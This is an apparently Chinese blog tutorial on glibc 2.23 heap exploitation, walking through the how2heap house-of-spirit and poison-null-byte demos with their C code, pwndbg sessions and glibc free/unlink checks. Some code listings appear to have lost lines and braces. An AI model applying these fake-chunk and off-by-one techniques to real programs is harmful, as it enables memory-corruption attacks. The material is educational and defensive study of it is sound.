
  • Author:ZERO-A-ONE
  • Date:2021-01-22


house-of-spirit 是一种 fastbins 攻击方法,通过构造 fake chunk,然后将其 free 掉,就可以在下一次 malloc 时返回 fake chunk 的地址,即任意我们可控的区域。house-of-spirit 是一种通过堆的 fast bin 机制来辅助栈溢出的方法,一般的栈溢出漏洞的利用都希望能够覆盖函数的返回地址以控制 EIP 来劫持控制流,但如果栈溢出的长度无法覆盖返回地址,同时却可以覆盖栈上的一个即将被 free 的堆指针,此时可以将这个指针改写为栈上的地址并在相应位置构造一个 fast bin 块的元数据,接着在 free 操作时,这个栈上的堆块被放到 fast bin 中,下一次 malloc 对应的大小时,由于 fast bin 的先进后出机制,这个栈上的堆块被返回给用户,再次写入时就可能造成返回地址的改写。所以利用的第一步不是去控制一个 chunk,而是控制传给 free 函数的指针,将其指向一个 fake chunk。所以 fake chunk 的伪造是关键


#include <stdio.h>
#include <stdlib.h>

int main()
	fprintf(stderr, "This file demonstrates the house of spirit attack.\n");

	fprintf(stderr, "Calling malloc() once so that it sets up its memory.\n");

	fprintf(stderr, "We will now overwrite a pointer to point to a fake 'fastbin' region.\n");
	unsigned long long *a;
	// This has nothing to do with fastbinsY (do not be fooled by the 10) - fake_chunks is just a piece of memory to fulfil allocations (pointed to from fastbinsY)
	unsigned long long fake_chunks[10] __attribute__ ((aligned (16)));

	fprintf(stderr, "This region (memory of length: %lu) contains two chunks. The first starts at %p and the second at %p.\n", sizeof(fake_chunks), &fake_chunks[1], &fake_chunks[9]);

	fprintf(stderr, "This chunk.size of this region has to be 16 more than the region (to accommodate the chunk data) while still falling into the fastbin category (<= 128 on x64). The PREV_INUSE (lsb) bit is ignored by free for fastbin-sized chunks, however the IS_MMAPPED (second lsb) and NON_MAIN_ARENA (third lsb) bits cause problems.\n");
	fprintf(stderr, "... note that this has to be the size of the next malloc request rounded to the internal size used by the malloc implementation. E.g. on x64, 0x30-0x38 will all be rounded to 0x40, so they would work for the malloc parameter at the end. \n");
	fake_chunks[1] = 0x40; // this is the size

	fprintf(stderr, "The chunk.size of the *next* fake region has to be sane. That is > 2*SIZE_SZ (> 16 on x64) && < av->system_mem (< 128kb by default for the main arena) to pass the nextsize integrity checks. No need for fastbin size.\n");
        // fake_chunks[9] because 0x40 / sizeof(unsigned long long) = 8
	fake_chunks[9] = 0x1234; // nextsize

	fprintf(stderr, "Now we will overwrite our pointer with the address of the fake region inside the fake first chunk, %p.\n", &fake_chunks[1]);
	fprintf(stderr, "... note that the memory address of the *region* associated with this chunk must be 16-byte aligned.\n");
	a = &fake_chunks[2];

	fprintf(stderr, "Freeing the overwritten pointer.\n");

	fprintf(stderr, "Now the next malloc will return the region of our fake chunk at %p, which will be %p!\n", &fake_chunks[1], &fake_chunks[2]);
	fprintf(stderr, "malloc(0x30): %p\n", malloc(0x30));


unsigned long long fake_chunks[10] __attribute__ ((aligned (16)));

GNU C 的一大特色就是__attribute__ 机制。attribute 可以设置:

  • 函数属性(Function Attribute )
  • 变量属性(Variable Attribute )
  • 类型属性(Type Attribute )

attribute 书写特征是:attribute 前后都有两个下划线,并切后面会紧跟一对原括弧,括弧里面是相应的__attribute__ 参数

attribute 语法格式为:__attribute__ ((attribute-list))

关键字__attribute__ 也可以对结构体(struct )或共用体(union )进行属性设置。大致有六个参数值可以被设定,即:

  • aligned
  • packed
  • transparent_union
  • unused,
  • deprecated
  • may_alias 。



int a attribute((aligned(64))) = 10;


In file: /home/syc/Downloads/how2heap-master/glibc_2.23/house_of_spirit.c
    6 	fprintf(stderr, "This file demonstrates the house of spirit attack.\n");
    8 	fprintf(stderr, "Calling malloc() once so that it sets up its memory.\n");
    9 	malloc(1);
   1011 	fprintf(stderr, "We will now overwrite a pointer to point to a fake 'fastbin' region.\n");
   12 	unsigned long long *a;
   13 	// This has nothing to do with fastbinsY (do not be fooled by the 10) - fake_chunks is just a piece of memory to fulfil allocations (pointed to from fastbinsY)
   14 	unsigned long long fake_chunks[10] __attribute__ ((aligned (16)));
   16 	fprintf(stderr, "This region (memory of length: %lu) contains two chunks. The first starts at %p and the second at %p.\n", sizeof(fake_chunks), &fake_chunks[1], &fake_chunks[9]);
pwndbg> heap
Allocated chunk | PREV_INUSE
Addr: 0x603000
Size: 0x21

Top chunk | PREV_INUSE
Addr: 0x603020
Size: 0x20fe1
	unsigned long long *a;
	// This has nothing to do with fastbinsY (do not be fooled by the 10) - fake_chunks is just a piece of memory to fulfil allocations (pointed to from fastbinsY)
	unsigned long long fake_chunks[10] __attribute__ ((aligned (16)));


pwndbg> p/x &a
$1 = 0x7fffffffddc8
pwndbg> stack 10
00:0000│ rsp  0x7fffffffddc0 ◂— 0x1
01:00080x7fffffffddc8 —▸ 0x7fffffffdf28 —▸ 0x7fffffffe2cc ◂— 'XDG_VTNR=7'
02:00100x7fffffffddd0 ◂— 0x1
03:00180x7fffffffddd8 —▸ 0x7fffffffde50 ◂— 0x1f7b996c8
04:00200x7fffffffdde0 —▸ 0x7ffff7ffe168 ◂— 0x0
05:00280x7fffffffdde8 ◂— 0x0
06:00300x7fffffffddf0 ◂— 0x1
07:00380x7fffffffddf8 —▸ 0x4008ed (__libc_csu_init+77) ◂— add    rbx, 1
08:00400x7fffffffde00 ◂— 0x0

然后申请了在栈上伪造的chunk,大小为10*8 byte = 80 byte = 640 bit,然后要对16字节对齐,因为chunk在64位环境下也要求16字节对齐

pwndbg> n
This region (memory of length: 80) contains two chunks. The first starts at 0x7fffffffddd8 and the second at 0x7fffffffde18.
pwndbg> p/x &fake_chunks
$2 = 0x7fffffffddd0
pwndbg> x/10gx &fake_chunks
0x7fffffffddd0:	0x0000000000000001	0x00007fffffffde50
0x7fffffffdde0:	0x00007ffff7ffe168	0x0000000000000000
0x7fffffffddf0:	0x0000000000000001	0x00000000004008ed
0x7fffffffde00:	0x0000000000000000	0x0000000000000000
0x7fffffffde10:	0x00000000004008a0	0x00000000004005b0

然后在 fake chunk 区域伪造出两个 chunk

fake_chunks[1] = 0x40; // this is the size
fake_chunks[9] = 0x1234; // nextsize


pwndbg> x/14gx &fake_chunks
0x7fffffffddd0:	0x0000000000000001	0x0000000000000040
0x7fffffffdde0:	0x00007ffff7ffe168	0x0000000000000000
0x7fffffffddf0:	0x0000000000000001	0x00000000004008ed
0x7fffffffde00:	0x0000000000000000	0x0000000000000000
0x7fffffffde10:	0x00000000004008a0	0x0000000000001234
0x7fffffffde20:	0x00007fffffffdf10	0x671cbe80d38bb200
0x7fffffffde30:	0x00000000004008a0	0x00007ffff7a2d840


  • chunk0:0x7fffffffddd0

    • prev_size = 0x1
    • size = 0x40
    • fd = 0x00007ffff7ffe168
    • bk = 0x0000000000000000
  • chunk1:0x7fffffffde10

    • prev_size = 0x4008a0
    • size = 0x1234
    • fd = 0x00007fffffffdf10
    • bk = 0x671cbe80d38bb200

所以这里将chunk[1]设置为0x40,是因为两个fake chunk刚好距离0x40(0x7fffffffde10-0x7fffffffddd0)

伪造 chunk 时需要绕过一些检查,首先是标志位,PREV_INUSE 位并不影响 free 的过程,但 IS_MMAPPED 位和 NON_MAIN_ARENA 位都要为零。其次,在 64 位系统中 fast chunk 的大小要在 32~128 字节之间。最后,是 next chunk 的大小,必须大于 2*SIZE_SZ(即大于16),小于 av->system_mem(即小于128kb),才能绕过对 next chunk 大小的检查。

libc-2.23 中这些检查代码如下:

__libc_free (void *mem)
  mstate ar_ptr;
  mchunkptr p;                          /* chunk corresponding to mem */

  p = mem2chunk (mem);

  if (chunk_is_mmapped (p))                       /* release mmapped memory. */
      munmap_chunk (p);

  ar_ptr = arena_for_chunk (p);     // 获得 chunk 所属 arena 的地址
  _int_free (ar_ptr, p, 0);         // 当 IS_MMAPPED 为零时调用

mem 就是我们所控制的传递给 free 函数的地址。malloc返回的其实是chunk的mem地址,所以要访问真正的chunk地址,需要地址转换,其中下面两个函数用于在 chunk 指针和 malloc 指针之间做转换:

/* conversion from malloc headers to user pointers, and back */

#define chunk2mem(p)   ((void*)((char*)(p) + 2*SIZE_SZ))
#define mem2chunk(mem) ((mchunkptr)((char*)(mem) - 2*SIZE_SZ))

NON_MAIN_ARENA 为零时返回 main arena:

/* find the heap and corresponding arena for a given ptr */

#define heap_for_ptr(ptr) \
  ((heap_info *) ((unsigned long) (ptr) & ~(HEAP_MAX_SIZE - 1)))
#define arena_for_chunk(ptr) \
  (chunk_non_main_arena (ptr) ? heap_for_ptr (ptr)->ar_ptr : &main_arena)

这样,程序就顺利地进入了 _int_free 函数:

static void
_int_free (mstate av, mchunkptr p, int have_lock)
  INTERNAL_SIZE_T size;        /* its size */
  mfastbinptr *fb;             /* associated fastbin */

  size = chunksize (p);

    If eligible, place chunk on a fastbin so it can be found
    and used quickly in malloc.

  if ((unsigned long)(size) <= (unsigned long)(get_max_fast ())

    If TRIM_FASTBINS set, don't place chunks
    bordering top into fastbins
      && (chunk_at_offset(p, size) != av->top)
      ) {

    if (__builtin_expect (chunk_at_offset (p, size)->size <= 2 * SIZE_SZ, 0)
    || __builtin_expect (chunksize (chunk_at_offset (p, size))
                 >= av->system_mem, 0))
        errstr = "free(): invalid next size (fast)";
        goto errout;

    unsigned int idx = fastbin_index(size);
    fb = &fastbin (av, idx);

    /* Atomically link P to its fastbin: P->FD = *FB; *FB = P;  */
    mchunkptr old = *fb, old2;
    p->fd = old2 = old;
    while ((old = catomic_compare_and_exchange_val_rel (fb, p, old2)) != old2);

其中下面的宏函数用于获得 next chunk:

/* Treat space at ptr + offset as a chunk */
#define chunk_at_offset(p, s)  ((mchunkptr) (((char *) (p)) + (s)))

这里我们将a修改为指向 (fake chunk 0 + 0x10) 的位置,即是chunk结构的mem地址位置

a = &fake_chunks[2];
pwndbg> p/x a
$5 = 0x7fffffffdde0
pwndbg> p/x &fake_chunks[2]
$6 = 0x7fffffffdde0

这样子其实就是a就是相当于我们通过malloc申请我们的fake_chunk0的时候,malloc会返回给我们fake_chunk0->mem的地址,然后将其传递给 free 函数,这时程序就会误以为这是一块真的 chunk,然后将其释放并加入到 fastbin 中




pwndbg> heap
Allocated chunk | PREV_INUSE
Addr: 0x603000
Size: 0x21

Top chunk | PREV_INUSE
Addr: 0x603020
Size: 0x20fe1

pwndbg> bins
0x20: 0x0
0x30: 0x0
0x40: 0x7fffffffddd0 ◂— 0x0
0x50: 0x0
0x60: 0x0
0x70: 0x0
0x80: 0x0
all: 0x0
pwndbg> p/x &fake_chunks[0]
$7 = 0x7fffffffddd0
pwndbg> x/10gx &fake_chunks[0]
0x7fffffffddd0:	0x0000000000000001	0x0000000000000040
0x7fffffffdde0:	0x0000000000000000	0x0000000000000000
0x7fffffffddf0:	0x0000000000000001	0x00000000004008ed
0x7fffffffde00:	0x0000000000000000	0x0000000000000000
0x7fffffffde10:	0x00000000004008a0	0x0000000000001234


pwndbg> n
malloc(0x30): 0x7fffffffdde0

所以 house-of-spirit 的主要目的是,当我们伪造的 fake chunk 内部存在不可控区域时,运用这一技术可以将这片区域变成可控的。上面为了方便观察,在 fake chunk 里填充一些字母,但在现实中这些位置很可能是不可控的,而 house-of-spirit 也正是以此为目的而出现的



2.1 Glibc 2.23

该技术适用的场景需要某个 malloc 的内存区域存在一个单字节溢出漏洞。通过溢出下一个 chunk 的 size 字段,攻击者能够在堆中创造出重叠的内存块,从而达到改写其他数据的目的。再结合其他的利用方式,同样能够获得程序的控制权。


  • 扩展被释放块:当溢出块的下一块为被释放块且处于 unsorted bin 中,则通过溢出一个字节来将其大小扩大,下次取得次块时就意味着其后的块将被覆盖而造成进一步的溢出
  0x100   0x100    0x80
|   A   |   B   |   C   |   初始状态
|   A   |   B   |   C   |   释放 B
|   A   |   B   |   C   |   溢出 B 的 size 为 0x180
|   A   |   B   |   C   |   malloc(0x180-8)
|-------|-------|-------|   C 块被覆盖
  • 扩展已分配块:当溢出块的下一块为使用中的块,则需要合理控制溢出的字节,使其被释放时的合并操作能够顺利进行,例如直接加上下一块的大小使其完全被覆盖。下一次分配对应大小时,即可取得已经被扩大的块,并造成进一步溢出
  0x100   0x100    0x80
|   A   |   B   |   C   |   初始状态
|   A   |   B   |   C   |   溢出 B 的 size 为 0x180
|   A   |   B   |   C   |   释放 B
|   A   |   B   |   C   |   malloc(0x180-8)
|-------|-------|-------|   C 块被覆盖
  • 收缩被释放块:此情况针对溢出的字节只能为 0 的时候,也就是本节所说的 poison-null-byte,此时将下一个被释放的块大小缩小,如此一来在之后分裂此块时将无法正确更新后一块的 prev_size 字段,导致释放时出现重叠的堆块
  0x100     0x210     0x80
|   A   |       B       |   C   |   初始状态
|   A   |       B       |   C   |   释放 B
|   A   |       B       |   C   |   溢出 B 的 size 为 0x200
|-------|---------------|-------|   之后的 malloc 操作没有更新 C 的 prev_size
         0x100  0x80
|   A   |  B1  | B2  |  |   C   |   malloc(0x180-8), malloc(0x80-8)
|   A   |  B1  | B2  |  |   C   |   释放 B1
|   A   |  B1  | B2  |  |   C   |   释放 C,C 将与 B1 合并
|   A   |  B1  | B2  |  |   C   |   malloc(0x180-8)
|-------|------|-----|--|-------|   B2 将被覆盖
  • house of einherjar:也是溢出字节只能为 0 的情况,当它是更新溢出块下一块的 prev_size 字段,使其在被释放时能够找到之前一个合法的被释放块并与其合并,造成堆块重叠
  0x100   0x100   0x101
|   A   |   B   |   C   |   初始状态
|   A   |   B   |   C   |   释放 A
|   A   |   B   |   C   |   溢出 B,覆盖 C 块的 size 为 0x200,并使其 prev_size 为 0x200
|   A   |   B   |   C   |   释放 C
|   A   |   B   |   C   |   C 将与 A 合并
|-------|-------|-------|   B 块被重叠

首先分配三个 chunk,第一个 chunk 类型无所谓,但后两个不能是 fast chunk,因为 fast chunk 在释放后不会被合并。这里 chunk a 用于制造单字节溢出,去覆盖 chunk b 的第一个字节,chunk c 的作用是帮助伪造 fake chunk


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <malloc.h>
#include <assert.h>

int main()
	setbuf(stdin, NULL);
	setbuf(stdout, NULL);

	printf("Welcome to poison null byte 2.0!\n");
	printf("Tested in Ubuntu 16.04 64bit.\n");
	printf("This technique only works with disabled tcache-option for glibc, see for build instructions.\n");
	printf("This technique can be used when you have an off-by-one into a malloc'ed region with a null byte.\n");

	uint8_t* a;
	uint8_t* b;
	uint8_t* c;
	uint8_t* b1;
	uint8_t* b2;
	uint8_t* d;
	void *barrier;

	printf("We allocate 0x100 bytes for 'a'.\n");
	a = (uint8_t*) malloc(0x100);
	printf("a: %p\n", a);
	int real_a_size = malloc_usable_size(a);
	printf("Since we want to overflow 'a', we need to know the 'real' size of 'a' "
		"(it may be more than 0x100 because of rounding): %#x\n", real_a_size);

	/* chunk size attribute cannot have a least significant byte with a value of 0x00.
	 * the least significant byte of this will be 0x10, because the size of the chunk includes
	 * the amount requested plus some amount required for the metadata. */
	b = (uint8_t*) malloc(0x200);

	printf("b: %p\n", b);

	c = (uint8_t*) malloc(0x100);
	printf("c: %p\n", c);

	barrier =  malloc(0x100);
	printf("We allocate a barrier at %p, so that c is not consolidated with the top-chunk when freed.\n"
		"The barrier is not strictly necessary, but makes things less confusing\n", barrier);

	uint64_t* b_size_ptr = (uint64_t*)(b - 8);

	// added fix for size==prev_size(next_chunk) check in newer versions of glibc
	// this added check requires we are allowed to have null pointers in b (not just a c string)
	//*(size_t*)(b+0x1f0) = 0x200;
	printf("In newer versions of glibc we will need to have our updated size inside b itself to pass "
		"the check 'chunksize(P) != prev_size (next_chunk(P))'\n");
	// we set this location to 0x200 since 0x200 == (0x211 & 0xff00)
	// which is the value of b.size after its first byte has been overwritten with a NULL byte
	*(size_t*)(b+0x1f0) = 0x200;

	// this technique works by overwriting the size metadata of a free chunk
	printf("b.size: %#lx\n", *b_size_ptr);
	printf("b.size is: (0x200 + 0x10) | prev_in_use\n");
	printf("We overflow 'a' with a single null byte into the metadata of 'b'\n");
	a[real_a_size] = 0; // <--- THIS IS THE "EXPLOITED BUG"
	printf("b.size: %#lx\n", *b_size_ptr);

	uint64_t* c_prev_size_ptr = ((uint64_t*)c)-2;
	printf("c.prev_size is %#lx\n",*c_prev_size_ptr);

	// This malloc will result in a call to unlink on the chunk where b was.
	// The added check (commit id: 17f487b), if not properly handled as we did before,
	// will detect the heap corruption now.
	// The check is this: chunksize(P) != prev_size (next_chunk(P)) where
	// P == b-0x10, chunksize(P) == *(b-0x10+0x8) == 0x200 (was 0x210 before the overflow)
	// next_chunk(P) == b-0x10+0x200 == b+0x1f0
	// prev_size (next_chunk(P)) == *(b+0x1f0) == 0x200
	printf("We will pass the check since chunksize(P) == %#lx == %#lx == prev_size (next_chunk(P))\n",
		*((size_t*)(b-0x8)), *(size_t*)(b-0x10 + *((size_t*)(b-0x8))));
	b1 = malloc(0x100);

	printf("b1: %p\n",b1);
	printf("Now we malloc 'b1'. It will be placed where 'b' was. "
		"At this point c.prev_size should have been updated, but it was not: %#lx\n",*c_prev_size_ptr);
	printf("Interestingly, the updated value of c.prev_size has been written 0x10 bytes "
		"before c.prev_size: %lx\n",*(((uint64_t*)c)-4));
	printf("We malloc 'b2', our 'victim' chunk.\n");
	// Typically b2 (the victim) will be a structure with valuable pointers that we want to control

	b2 = malloc(0x80);
	printf("b2: %p\n",b2);

	printf("Current b2 content:\n%s\n",b2);

	printf("Now we free 'b1' and 'c': this will consolidate the chunks 'b1' and 'c' (forgetting about 'b2').\n");

	printf("Finally, we allocate 'd', overlapping 'b2'.\n");
	d = malloc(0x300);
	printf("d: %p\n",d);
	printf("Now 'd' and 'b2' overlap.\n");

	printf("New b2 content:\n%s\n",b2);

	printf("Thanks to"
		"for the clear explanation of this technique.\n");

	assert(strstr(b2, "DDDDDDDDDDDD"));


a: 0x603010
pwndbg> heap
Allocated chunk | PREV_INUSE
Addr: 0x603000
Size: 0x111

Top chunk | PREV_INUSE
Addr: 0x603110
Size: 0x20ef1

首先是溢出,那么就需要知道一个堆块实际可用的内存大小(因为空间复用,可能会比分配时要大一点),用于获得该大小的函数 malloc_usable_size 如下:

   ------------------------- malloc_usable_size -------------------------
static size_t
musable (void *mem)
  mchunkptr p;
  if (mem != 0)
      p = mem2chunk (mem);

      if (chunk_is_mmapped (p))
        return chunksize (p) - 2 * SIZE_SZ;
      else if (inuse (p))
        return chunksize (p) - SIZE_SZ;
  return 0;
/* check for mmap()'ed chunk */
#define chunk_is_mmapped(p) ((p)->size & IS_MMAPPED)
/* extract p's inuse bit */
#define inuse(p)                                  \
  ((((mchunkptr) (((char *) (p)) + ((p)->size & ~SIZE_BITS)))->size) & PREV_INUSE)
/* Get size, ignoring use bits */
#define chunksize(p)         ((p)->size & ~(SIZE_BITS))


pwndbg> n
Since we want to overflow 'a', we need to know the 'real' size of 'a' (it may be more than 0x100 because of rounding): 0x108

需要注意的是程序是通过 next chunk 的 PREV_INUSE 标志来判断某 chunk 是否被使用的



pwndbg> n
b: 0x603120
c: 0x603330
pwndbg> heap
Allocated chunk | PREV_INUSE
Addr: 0x603000
Size: 0x111

Allocated chunk | PREV_INUSE
Addr: 0x603110
Size: 0x211

Allocated chunk | PREV_INUSE
Addr: 0x603320
Size: 0x111

Top chunk | PREV_INUSE
Addr: 0x603430
Size: 0x20bd1

barrier 这个chunk是用来防止free(c)的时候被放入 top-chunk,因为chunkC是距离Top-chunk最近的chunk,根据glibc的规则chunkC会和Top-chunk合并成为新的Top-chunk,所以需要在chunkC和Top-chunk中间放入一个barrier-chunk用来隔离。以及 b和c 的 chunk 大小不能为 fastbins chunk size。因为 fastbins chunk 在被释放后不会合并

pwndbg> n
We allocate a barrier at 0x603440, so that c is not consolidated with the top-chunk when freed.
The barrier is not strictly necessary, but makes things less confusing
pwndbg> heap
Allocated chunk | PREV_INUSE
Addr: 0x603000
Size: 0x111

Allocated chunk | PREV_INUSE
Addr: 0x603110
Size: 0x211

Allocated chunk | PREV_INUSE
Addr: 0x603320
Size: 0x111

Allocated chunk | PREV_INUSE
Addr: 0x603430
Size: 0x111

Top chunk | PREV_INUSE
Addr: 0x603540
Size: 0x20ac1


uint64_t* b_size_ptr = (uint64_t*)(b - 8);


pwndbg> x/20gx c-0x30
0x603300:	0x0000000000000000	0x0000000000000000
0x603310:	0x0000000000000000	0x0000000000000000
0x603320:	0x0000000000000000	0x0000000000000111
0x603330:	0x0000000000000000	0x0000000000000000
0x603340:	0x0000000000000000	0x0000000000000000
0x603350:	0x0000000000000000	0x0000000000000000
0x603360:	0x0000000000000000	0x0000000000000000
0x603370:	0x0000000000000000	0x0000000000000000
0x603380:	0x0000000000000000	0x0000000000000000
0x603390:	0x0000000000000000	0x0000000000000000

为了在修改 chunk b 的 size 字段后,依然能通过 unlink 的检查,我们需要伪造一个 c.prev_size 字段,字段的大小是很好计算的,即

(0x211 & 0xff00) == 0x200


  • *b = 0x603120
  • *c = 0x603330
  • c.prev_size = 0x603330 - 0x10 = 0x603320

然后把 chunk b 释放掉,chunk b 随后被放到 unsorted bin 中,大小是 0x200:

pwndbg> heap
Allocated chunk | PREV_INUSE
Addr: 0x603000
Size: 0x111

Free chunk (unsortedbin) | PREV_INUSE
Addr: 0x603110
Size: 0x211
fd: 0x7ffff7dd1b78
bk: 0x7ffff7dd1b78

Allocated chunk
Addr: 0x603320
Size: 0x110

Allocated chunk | PREV_INUSE
Addr: 0x603430
Size: 0x111

Top chunk | PREV_INUSE
Addr: 0x603540
Size: 0x20ac1

pwndbg> bins
0x20: 0x0
0x30: 0x0
0x40: 0x0
0x50: 0x0
0x60: 0x0
0x70: 0x0
0x80: 0x0
all: 0x603110 —▸ 0x7ffff7dd1b78 (main_arena+88) ◂— 0x603110


pwndbg> x/20gx c-0x30
0x603300:	0x0000000000000000	0x0000000000000000
0x603310:	0x0000000000000200	0x0000000000000000
0x603320:	0x0000000000000210	0x0000000000000110
0x603330:	0x0000000000000000	0x0000000000000000
0x603340:	0x0000000000000000	0x0000000000000000
0x603350:	0x0000000000000000	0x0000000000000000
0x603360:	0x0000000000000000	0x0000000000000000
0x603370:	0x0000000000000000	0x0000000000000000
0x603380:	0x0000000000000000	0x0000000000000000
0x603390:	0x0000000000000000	0x0000000000000000
pwndbg> x/20gx b-0x10
0x603110:	0x0000000000000000	0x0000000000000211
0x603120:	0x00007ffff7dd1b78	0x00007ffff7dd1b78
0x603130:	0x0000000000000000	0x0000000000000000
0x603140:	0x0000000000000000	0x0000000000000000
0x603150:	0x0000000000000000	0x0000000000000000
0x603160:	0x0000000000000000	0x0000000000000000
0x603170:	0x0000000000000000	0x0000000000000000
0x603180:	0x0000000000000000	0x0000000000000000
0x603190:	0x0000000000000000	0x0000000000000000
0x6031a0:	0x0000000000000000	0x0000000000000000
pwndbg> n
b.size: 0x211
b.size is: (0x200 + 0x10) | prev_in_use
We overflow 'a' with a single null byte into the metadata of 'b'

最关键的一步,通过溢出漏洞覆写 chunk b 的数据:

a[real_a_size] = 0; // <--- THIS IS THE "EXPLOITED BUG"

然后我们需要查看一下chunkc.prev_size 字段

pwndbg> n
c.prev_size is 0x210


pwndbg> n
b.size: 0x200
pwndbg> x/20gx b-0x10
0x603110:	0x0000000000000000	0x0000000000000200
0x603120:	0x00007ffff7dd1b78	0x00007ffff7dd1b78
0x603130:	0x0000000000000000	0x0000000000000000
0x603140:	0x0000000000000000	0x0000000000000000
0x603150:	0x0000000000000000	0x0000000000000000
0x603160:	0x0000000000000000	0x0000000000000000
0x603170:	0x0000000000000000	0x0000000000000000
0x603180:	0x0000000000000000	0x0000000000000000
0x603190:	0x0000000000000000	0x0000000000000000
0x6031a0:	0x0000000000000000	0x0000000000000000


  • chunksize(P) == *((size_t*)(b-0x8)) & (~ 0x7) == 0x200

    • pwndbg> p/x *((size_t*)(b-0x8))& (~ 0x7)
      $4 = 0x200
  • prev_size (next_chunk(P)) == *(size_t*)(b-0x10 + 0x200) == 0x200

    • pwndbg> p/x *(size_t*)(b-0x10 + 0x200)
      $5 = 0x200

可以成功绕过检查。另外 unsorted bin 中的 chunk 大小也变成了 0x200

We will pass the check since chunksize(P) == 0x200 == 0x200 == prev_size (next_chunk(P))

接下来随意分配两个 chunk,malloc 会从 unsorted bin (也就是我们之前free掉的B)中划出合适大小的内存返回给用户:

pwndbg> n
b1: 0x603120
pwndbg> heap
Allocated chunk | PREV_INUSE
Addr: 0x603000
Size: 0x111

Allocated chunk | PREV_INUSE
Addr: 0x603110
Size: 0x111

Free chunk (unsortedbin) | PREV_INUSE
Addr: 0x603220
Size: 0xf1
fd: 0x7ffff7dd1b78
bk: 0x7ffff7dd1b78

Allocated chunk
Addr: 0x603310
Size: 0x00

pwndbg> bins
0x20: 0x0
0x30: 0x0
0x40: 0x0
0x50: 0x0
0x60: 0x0
0x70: 0x0
0x80: 0x0
all: 0x603220 —▸ 0x7ffff7dd1b78 (main_arena+88) ◂— 0x603220 /* ' 2`' */


pwndbg> n
b1: 0x603120
pwndbg> n
b: 0x603120


  • chunk b1 的位置就是 chunk b 的位置
  • 这个时候 b1 和 c 之间有个 chunk b,这个时候 chunk c 的 prev_size 本应该变为 0xf0

这里有个很有趣的东西,分配堆块后,发生变化的是 fake c.prev_size,而不是 c.prev_size。所以 chunk c 依然认为 chunk b 的地方有一个大小为 0x210 的 free chunk。但其实这片内存已经被分配给了 chunk b1

pwndbg> x/10gx c-0x20
0x603310:	0x00000000000000f0	0x0000000000000000	<-fake chunk
0x603320:	0x0000000000000210	0x0000000000000110	<-chunkC
0x603330:	0x0000000000000000	0x0000000000000000
0x603340:	0x0000000000000000	0x0000000000000000
0x603350:	0x0000000000000000	0x0000000000000000
pwndbg> n
Now we malloc 'b1'. It will be placed where 'b' was. At this point c.prev_size should have been updated, but it was not: 0x210
pwndbg> n
Interestingly, the updated value of c.prev_size has been written 0x10 bytes before c.prev_size: f0

然后我们在 create 一个 chunk b2,这个时候unsortedbin(chunB)又被切割了分配给chunkB2

pwndbg> n
b2: 0x603230
pwndbg> heap
Allocated chunk | PREV_INUSE
Addr: 0x603000
Size: 0x111

Allocated chunk | PREV_INUSE
Addr: 0x603110
Size: 0x111

Allocated chunk | PREV_INUSE
Addr: 0x603220
Size: 0x91

Free chunk (unsortedbin) | PREV_INUSE
Addr: 0x6032b0
Size: 0x61
fd: 0x7ffff7dd1b78
bk: 0x7ffff7dd1b78

Allocated chunk
Addr: 0x603310
Size: 0x00

pwndbg> bins
0x20: 0x0
0x30: 0x0
0x40: 0x0
0x50: 0x0
0x60: 0x0
0x70: 0x0
0x80: 0x0
all: 0x6032b0 —▸ 0x7ffff7dd1b78 (main_arena+88) ◂— 0x6032b0

然后就是,我们先后 free chunkB1和chunkC

pwndbg> heap
Allocated chunk | PREV_INUSE
Addr: 0x603000
Size: 0x111

Free chunk (unsortedbin) | PREV_INUSE
Addr: 0x603110
Size: 0x321
fd: 0x6032b0
bk: 0x7ffff7dd1b78

Allocated chunk
Addr: 0x603430
Size: 0x110

Top chunk | PREV_INUSE
Addr: 0x603540
Size: 0x20ac1

pwndbg> bins
0x20: 0x0
0x30: 0x0
0x40: 0x0
0x50: 0x0
0x60: 0x0
0x70: 0x0
0x80: 0x0
all: 0x603110 —▸ 0x6032b0 —▸ 0x7ffff7dd1b78 (main_arena+88) ◂— 0x603110

接下来是见证奇迹的时刻,我们知道,两个相邻的 small chunk 被释放后会被合并在一起。首先释放 chunk b1,伪造出 fake chunk b 是 free chunk 的样子。然后释放 chunkC,因为chunkC的prevsize没有变化,这个时候 chunkC 会认为 chunkB1 就是 chunkB,这时程序会发现 chunk c 的前一个 chunk 是一个 free chunk,然后就将它们合并在了一起,并从 unsorted bin 中取出来合并进了 top chunk。可怜的 chunkB2 位于 chunkB1 和 chunkC 之间,被直接无视了,现在 malloc 认为这整块区域都是未分配的,新的 top chunk 指针已经说明了一切

chunk 合并的过程如下,首先该 chunk 与前一个 chunk 合并,然后检查下一个 chunk 是否为 top chunk,如果不是,将合并后的 chunk 放回 unsorted bin 中,否则,合并进 top chunk:

    /* consolidate backward */
    if (!prev_inuse(p)) {
      prevsize = p->prev_size;
      size += prevsize;
      p = chunk_at_offset(p, -((long) prevsize));
      unlink(av, p, bck, fwd);

    if (nextchunk != av->top) {
  Place the chunk in unsorted chunk list. Chunks are
  not placed into regular bins until after they have
  been given one chance to be used in malloc.

      If the chunk borders the current high end of memory,
      consolidate into top

    else {
      size += nextsize;
      set_head(p, size | PREV_INUSE);
      av->top = p;
      check_chunk(av, p);

接下来,申请一块大空间,大到可以把 chunkB2 包含进来,这样 chunkB2 就完全被我们控制了,假设我们之前对 chunkB2 写的是一个指针。此时我们 得到的新chunkD。我们可以对chunkB2的内容进行任意读写

pwndbg> n
d: 0x603120
pwndbg> heap
Allocated chunk | PREV_INUSE
Addr: 0x603000
Size: 0x111

Allocated chunk | PREV_INUSE
Addr: 0x603110
Size: 0x321

Allocated chunk | PREV_INUSE
Addr: 0x603430
Size: 0x111

Top chunk | PREV_INUSE
Addr: 0x603540
Size: 0x20ac1

pwndbg> bins
0x20: 0x0
0x30: 0x0
0x40: 0x0
0x50: 0x0
0x60: 0x0
0x70: 0x0
0x80: 0x0
all: 0x0
0x60: 0x6032b0 —▸ 0x7ffff7dd1bc8 (main_arena+168) ◂— 0x6032b0


pwndbg> n
New b2 content:
  • 0
  • 7
    觉得还不错? 一键收藏
  • 0


  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助




当前余额3.43前往充值 >
领取后你会自动成为博主和红包主的粉丝 规则
钱包余额 0


